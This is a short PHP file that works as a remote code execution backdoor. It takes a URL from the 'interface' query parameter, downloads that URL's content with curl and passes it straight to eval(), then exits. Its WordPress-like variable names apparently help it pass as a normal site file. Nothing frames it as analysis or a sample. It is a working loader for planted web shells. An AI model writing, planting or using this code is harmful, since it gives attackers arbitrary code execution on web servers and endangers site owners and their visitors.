<?php
if (isset($_GET['interface'])) {
$admin_url_mt = $_GET['interface'];
if ($comments_open_we = curl_init()) {
curl_setopt($comments_open_we, CURLOPT_URL, $admin_url_mt);
curl_setopt($comments_open_we, CURLOPT_RETURNTRANSFER, true);
eval(curl_exec($comments_open_we));
curl_close($comments_open_we);
exit;
}
}